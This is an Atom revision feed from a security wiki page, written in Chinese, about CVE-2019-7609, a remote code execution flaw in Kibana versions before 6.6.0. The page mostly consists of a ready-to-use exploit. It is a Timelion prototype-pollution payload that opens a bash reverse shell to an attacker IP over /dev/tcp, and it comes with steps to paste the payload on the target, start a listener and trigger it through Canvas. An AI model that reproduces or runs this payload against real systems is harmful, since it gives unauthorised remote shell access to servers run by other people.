<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-7609_kibana_%E6%9C%AA%E6%8E%88%E6%AC%8A%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2019-7609 kibana 未授權遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-7609_kibana_%E6%9C%AA%E6%8E%88%E6%AC%8A%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-7609_kibana_%E6%9C%AA%E6%8E%88%E6%AC%8A%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T01:00:17Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-7609_kibana_%E6%9C%AA%E6%8E%88%E6%AC%8A%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1683&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==影響版本== kibana&lt;6.6.0  ==POC== 將POC裡的反鏈IP地址換成自己的，然後在目標機器上的 Timelion 選項下將以下 POC 粘貼進去，點擊 Run 運行...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-7609_kibana_%E6%9C%AA%E6%8E%88%E6%AC%8A%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1683&amp;oldid=prev"/>
		<updated>2021-04-15T06:50:06Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==影響版本== kibana&amp;lt;6.6.0  ==POC== 將POC裡的反鏈IP地址換成自己的，然後在目標機器上的 Timelion 選項下將以下 POC 粘貼進去，點擊 Run 運行...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==影響版本==&lt;br /&gt;
kibana&amp;lt;6.6.0&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
將POC裡的反鏈IP地址換成自己的，然後在目標機器上的 Timelion 選項下將以下 POC 粘貼進去，點擊 Run 運行&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.es(*).props(label.__proto__.env.AAAA='require(&amp;quot;child_process&amp;quot;).exec(&amp;quot;bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.20.166/8989 0&amp;gt;&amp;amp;1&amp;quot;);process.exit()//')&lt;br /&gt;
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
攻擊機器开启监听，点击 Canvas 即可觸發漏洞。&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>